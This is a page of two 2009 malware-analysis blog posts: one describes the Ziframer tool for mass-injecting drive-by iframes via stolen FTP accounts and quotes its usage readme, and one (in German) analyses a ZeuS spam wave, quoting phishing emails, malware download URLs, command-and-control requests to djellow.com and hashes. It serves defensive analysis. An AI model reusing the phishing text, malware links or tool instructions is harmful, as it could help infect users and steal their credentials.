Search Results for 'wsnpoem'

Page 2 of 19

An Iframer for Dummies

Published on September 3, 2009 in Malware & Virus Analysing. 1 Comment Tags: , , , , .

Today I came accross an Iframer called Ziframer. But first of all: What is an Iframer?

An Iframer is a script which is used to test stolen FTP accounts and inject malicious code into web pages. If an FTP account is valid, the Iframer automaticly puts an Drive-by infection on the specified html, php or asp files.

In this case the Iframer is a PHP-script which is used to spread a variant of ZeuS (aka Zbot/WSNPoem). The Iframer is called “Ziframer” and is sold for 30$. The PHP script can bee launched via command line or accessed using a web browser:

Ziframer v1.3

The script is very simple and just needs a list of FTP accounts which the script should check. As you can see on the screenshot above, the input file (ftp.txt) currently contains more then 18’000 stolen FTP credentials:

Stolen FTP credentials title=

In the file “iframe.txt” the attacker can define the (JavaScript- or HTML-) code he would like to inject:

Malicious Iframe

The cyberciminal has also the possibility to set a timeout, a file where the script will report invalid FTP credentials (bad.txt) and a file which will collect valid FTP credentials (good.txt). The screenshot below shows you the script while working through the list of stolen FTP credentials (ftp.txt):

validinftpaccounts

Last but not least the attacker has to define where he wants to put the malicious code. He has the following options:

start page – Inject the code at the top of the page
end – Inject the code at the bottom of the page
change – Replace a text or a string in the page with the malicious code
check – Check if the malicious code is already on the page

Now the cybercriminal has just to press the “START” button to run the script. The Iframer script will now get through the FTP accounts and inject the malicious code which is defined in the file “iframe.txt” (see this one).

To make the use of the script more user friendly, the script has a readme file which describes the usage of the script in russian and english.

Content of readme.html (english):

This script is designed to test the FTP accounts on the validity, insert the code into files on the FTP.

[Features]
[*] Console and Web interface
[*] Stabilno runs under Windows and Nix BSD
[*] Check for validity ftp
[*] Paste the Code (at the beginning or end of file. Or a full overwrite the file to your text – defeys)
[*] Strange Komentirovanie iframe’ov
[*] Convenience logs [*] All akki (valid \ invalid) remain in the database.
[*] The names of files, to insert the code can be set regExp’om, such as index \ .(.*)[_ b] or [_b ](.*). php | html | asp | htm.
[*] It takes on all the folders on the site.
[*] Function update replaces your old code to the new (for example, changed the addresses fryma)

[Run]
[!] Recommend to use the console interface

Windows
Open a console (Start-> Run-> cmd)
Write to the path to php.exe for example c: \ php \ php.exe
then write the path to the script (zifr.php)
For example the so-c: \ php \ php.exe D: \ soft \ ziframer \ zifr.php
the script will run and display a certificate.

* NIX
Open the console / ssh
Write to php then write the path to the script (zifr.php)
For example the so-php / home / user / soft / ziframer / zifr.php
the script will run and display a certificate.

[Options]
-file -f Path to the file to your FTP
-code -c path to a file with code introduced
-inject -i Where vstavlt code three options
start – top of the page
end – in the bottom of the page
change – replace the text in the page code
-time -t Timeout for connecting to the FTP
-del -d With this option chyuzhye ifremy komentiruyutsya
-update -u Update your code with this option, the script ishet inserted your code and replaces it with a new
-good -g file where badat skladyvatsya working FTP
-bad -b file where badat skladyvatsya not working FTP
-hide -h If you enable this option, your code will not markerovatsya but you will not be able to use the function update
-restore -r Continue from the last FTP if you had not had time to do the whole list you can start from where you stopped

Conclusion

The Ziframe script is very simple an cheap. Even a n00b is able to use it.

It also demonstrates how efficiently and easily cybercriminals can distribute their malicious code to tremendous numbers of stolen FTP accounts. Automated mechanisms like this one shows how infection vectors are more and more shifted from E-mails with malicious attachments to Drive-by. The modular approach allows the cybercriminal to feed the script with different lists of compromised accounts that can be acquired on the underground market.

WSNPoem: report_8977.exe

Published on June 17, 2009 in Malware & Virus Analysing. 1 Comment Tags: , , , , , .

Seit heute Nachmittag ist erneut eine Spam-Welle unterwegs, welche den Banken-Trojaner ZeuS (aka zbot / wsnpoem) verbreitet:

Subject: Information of your Transactions

Good evening
Dear Credit Card Holder:

The last transaction report on your credit card shows a number of transactions that have questionable background. That gives us reasons to believe that your credit card details have been stolen, and your card has been abused for making unauthorized payments.

Enclosed is the listing of transactions made with your credit card between 13.06.2009 and 15.06.2009. Please look through the enclosed document carefully and pay special attention to the last three of the listed transactions they are the ones that we suspect to be fraudulent.

Please find time to review the enclosed account statement and confirm the transactions you have authorized in person. This would help us both to have this issue resolved as quickly as possible.

The Word-formatted copy of your transaction list:

http://scananida.com.pl/report_8977.exe

Email Text sowie der Betreff scheint immer der selbe zu sein. Der Absender der Email ist gefälscht und variiert. Interessant ist, dass der Trojaner diesmal nicht in einer ZIP-Datei daher kommt: vielmehr verweist ein Link am Ende des Emails auf eine gehackte Webseite, wo das ZeuS binary liegt:

http://scananida.com.pl/report_8977.exe

;; QUESTION SECTION:
;scananida.com.pl. IN A

;; ANSWER SECTION:
scananida.com.pl. 39283 IN A 91.121.8.196

route: 91.121.0.0/18
descr: OVH ISP
descr: Paris, France
origin: AS16276
mnt-by: OVH-MNT

Äusserst erschreckend ist die Tatsache, dass das Binary derzeit gerade einmal von zwei Antivirus Herstellern als Malware erkannt wird:

Filename: report_8977.exe
File size: 81920 bytes
MD5 : d4e6069285270e41ef470d897cf26e36
SHA1 : 854bf8ff8933cd30797eb1d2e134a4895f574af6
Erkennungsrate: 2/41 (4.88%)

Fürt der Empfänger der Email das EXE-File aus, nistet sich ZeuS im System ein und lauscht nach Login Daten für Mail-, Bank-, und Social Network-Accounts. Auffallend ist, dass auch dieses mal die gestohlenen Daten wieder an den uns bereits bekannten Command&Control Server djellow.com (siehe WSNPoem: client_update.zip / WSNPoem: Spam-Wellen fluten das Netz) gesendet werden:

GET http://djellow.com/djwlc/djwl.bin <- ZeuS configuration file
GET http://djellow.com/djwlc/bin.exe <- Latest ZeuS binary
POST http://djellow.com/djwl/rec.php <- Dropzone

Auch der Ort, wo sich der Trojaner im System ein nistet, ist wieder der selbe:

C:\WINDOWS\system32\sdra64.exe
C:\WINDOWS\system32\lowsec
C:\WINDOWS\system32\lowsec\user.ds
C:\WINDOWS\system32\lowsec\local.ds

Fazit

  • Emails mit dem Betreff Information of your Transactions temporär an den Email Gateways abweisen
  • Den Zugriff auf djellow.com (91.206.201.6) sperren
  • Da seit einigen Tagen gleich mehrere solcher ZeuS Spam-Wellen unterwegs sind, empfielt sich eine erhöte Wachsamkeit beim öffnen von Emails mit umbekanntem oder verdächtigen Absender

    • UPDATE 20:31 Uhr

    Scheinbar scheint noch eine zweite ZeuS Spam-Welle die Runde zu machen:

    Subject: Worldpay CARD transaction Confirmation

    Your transaction has been processed by WorldPay, on behalf of Amazon Inc.

    http://w-crook.com.ar/report_8977.exe

    This is not a tax receipt.
    We processed your payment.
    Amazon Inc has received your order,
    and will inform you about delivery.
    Sincerely,
    Amazon Team

    This confirmation only indicates that your transaction has been processed
    successfully.
    It does not indicate that your order has been accepted.
    It is the responsibility of Amazon Inc to confirm that
    your order has been accepted, and to deliver any goods or services you have
    ordered.

    Text und Betreff sind immer die gleichen. Die im Spam-Mail angepriesene URL ist eine andere, als die URL aus dem “Information of your Transactions” Spam-Mail, das dort angebotene Binary ist jedoch das selbe:

    http://w-crook.com.ar/report_8977.exe

    Filename: report_8977.exe
    File size: 81920 bytes
    MD5 : d4e6069285270e41ef470d897cf26e36
    SHA1 : 854bf8ff8933cd30797eb1d2e134a4895f574af6
    Erkennungsrate: 2/41 (4.88%)
    economics-recluse
    Scene
    Urgent!